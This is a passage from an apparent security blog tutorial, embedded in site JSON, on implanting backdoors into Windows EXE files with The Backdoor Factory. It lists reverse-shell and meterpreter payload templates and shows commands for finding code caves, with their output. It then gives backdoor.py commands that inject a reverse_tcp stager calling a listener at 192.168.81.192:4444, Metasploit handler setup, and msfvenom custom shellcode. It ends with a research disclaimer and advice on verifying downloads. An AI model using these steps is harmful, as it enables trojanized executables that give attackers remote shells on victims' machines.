follows:\u003C\u002Fp>\u003Cul>\u003Cli>cave_miner_inline\u003C\u002Fli>\u003Cli>iat_reverse_tcp_inline\u003C\u002Fli>\u003Cli>iat_reverse_tcp_inline_threaded\u003C\u002Fli>\u003Cli>iat_reverse_tcp_stager_threaded\u003C\u002Fli>\u003Cli>iat_user_supplied_shellcode_threaded\u003C\u002Fli>\u003Cli>meterpreter_reverse_https_threaded\u003C\u002Fli>\u003Cli>reverse_shell_tcp_inline\u003C\u002Fli>\u003Cli>reverse_tcp_stager_threaded\u003C\u002Fli>\u003Cli>user_supplied_shellcode_threaded\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Name resolution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>cave_miner_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>As a payload template with a length of 135, it only implements control flow jumps and performs no other operations, serving as a template for custom shellcode development.\u003C\u002Fp>\u003Cp>The disassembled payload format is shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017487710_3_d721473ed4-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>reverse_shell_tcp_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Corresponding meterpreter server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>meterpreter_reverse_https_threaded:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Corresponding meterpreter server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_https\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>iat in iat_reverse_tcp_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>iat stands for Import Address Table. If the PE file's IAT does not include the APIs LoadLibraryA and GetProcAddress, directly executing the payload reverse_shell_tcp_inline will fail. iat_reverse_tcp_inline adds functionality to repair the IAT to avoid execution failure.\u003C\u002Fp>\u003Cp>\u003Cstrong>user_supplied_shellcode_threaded:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Custom payload, which can be generated via msf.\u003C\u002Fp>\u003Ch3>3. Search for available Code Caves in the file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If the payload length is 703, the Code Caves must satisfy a length greater than 703. Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -c -l 703\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017497493_4_9b62c67208-1.jpeg\">\u003C\u002Fp>\u003Cp>Found three exploitable locations in total:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>No section\u003Cbr>-&gt;Begin Cave 0x240\u003Cbr>-&gt;End of Cave 0x1000\u003Cbr>Size of Cave (int) 3520\u003Cbr>**************************************************\u003Cbr>No section\u003Cbr>-&gt;Begin Cave 0x693a\u003Cbr>-&gt;End of Cave 0x700c\u003Cbr>Size of Cave (int) 1746\u003Cbr>**************************************************\u003Cbr>We have a winner: .data\u003Cbr>-&gt;Begin Cave 0x7051\u003Cbr>-&gt;End of Cave 0x7350\u003Cbr>Size of Cave (int) 767\u003Cbr>SizeOfRawData 0x1000\u003Cbr>PointerToRawData 0x7000\u003Cbr>End of Raw Data: 0x8000\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output address is a Relative Virtual Address (RVA), which is the offset address relative to the file header (base address Image Base)\u003C\u002Fp>\u003Cp>The actual address in memory (Virtual Address) = Image Base + RVA\u003C\u002Fp>\u003Cp>ImageBase = 0x00400000\u003C\u002Fp>\u003Cp>Use Immunity Debugger to view the memory structure for verification\u003C\u002Fp>\u003Cp>Memory structure as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017505897_5_cb528d3f77-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(1)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>No section\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x240\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x1000\u003C\u002Fp>\u003Cp>Size of Cave (int) 3520\u003C\u002Fp>\u003Cp>Actual memory address is 0x00400240-0x00401000, located in the PE header, default permission is R\u003C\u002Fp>\u003Cp>View memory address data as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017511367_6_a5650cbb10-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(2)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>No section\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x693a\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x700c\u003C\u002Fp>\u003Cp>Size of Cave (int) 1746\u003C\u002Fp>\u003Cp>Actual memory address is 0x0040693a-0x0040700c, located in the .rdata section, default permission is R\u003C\u002Fp>\u003Cp>View memory address data as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017516858_7_afee61644d-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(3)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>We have a winner: .data\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x7051\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x7350\u003C\u002Fp>\u003Cp>Size of Cave (int) 767\u003C\u002Fp>\u003Cp>Actual memory address is 0x00407051-0x00407350, located in the .data section with default RW permissions\u003C\u002Fp>\u003Cp>View memory address data as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017521356_8_7157a1aa5d-1.jpeg\">\u003C\u002Fp>\u003Cp>It can be seen that the Code Caves found through The Backdoor Factory all meet the requirements\u003C\u002Fp>\u003Ch3>4. Add payload\u003C\u002Fh3>\u003Cp>Here, reverse_tcp_stager_threaded is selected for testing, with a payload length of 703\u003C\u002Fp>\u003Cp>Server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(1) Add a new section to save the payload\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -a -o test1.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The new section is named .sdata with RWE permissions\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017524645_9_9ef2f8743b-1.jpeg\">\u003C\u002Fp>\u003Cp>If specifying the new section name as aaa, the parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -a -n aaa -o test1.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Save the payload into the .data section\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -o test2.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the .data section as prompted\u003C\u002Fp>\u003Cp>Change the .data section permissions to RWE, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017526812_10_c6ff04d607-1.jpeg\">\u003C\u002Fp>\u003Cp>Add jump code JMP TEST2.00407055 at the program entry point, where 0x00407055 stores the added payload\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017528213_11_46aa0eab2d-1.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Save payload to other segments\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -o test3.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the PE header as prompted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017530136_12_f89f65a0d1-1.jpeg\">\u003C\u002Fp>\u003Cp>Execution will report an error and needs to be fixed\u003C\u002Fp>\u003Cp>Use the tool nasm_shell to convert assembly code into hexadecimal data\u003C\u002Fp>\u003Cp>Kali2.0 integrates nasm_shell by default\u003C\u002Fp>\u003Cp>Tool usage is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017531304_13_1444d8a8ba-1.jpeg\">\u003C\u002Fp>\u003Ch4>(4) Custom payload\u003C\u002Fh4>\u003Cp>Generate payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmessagebox -f raw &gt;msg.bin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Add payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -s user_supplied_shellcode_threaded -U msg.bin -o test4.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Testing as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017532156_14_834d64cab9-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of implanting backdoors into EXE files using The Backdoor Factory, leveraging Code Caves to avoid altering the original file size.\u003C\u002Fp>\u003Cp>Of course, this exploitation method has already been detected by antivirus software. The content presented here is for technical research purposes only.\u003C\u002Fp>\u003Cp>From a defensive perspective, extra caution is required when downloading files: only download programs from trusted sources and verify file hashes.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1303,"Onedaysec",6,"published","2026-02-02T07:51:00.264Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Backdoor EXE Files with The Backdoor Factory - Implant Guide","backdoor implantation, EXE backdoor, The Backdoor Factory, code caves, PE file format, payload injection, reverse shell, meterpreter, shellcode",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46],378,377,376,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.806Z","2026-07-23T16:01:28.822Z","draft","2026-07-23T16:05:46.259Z"]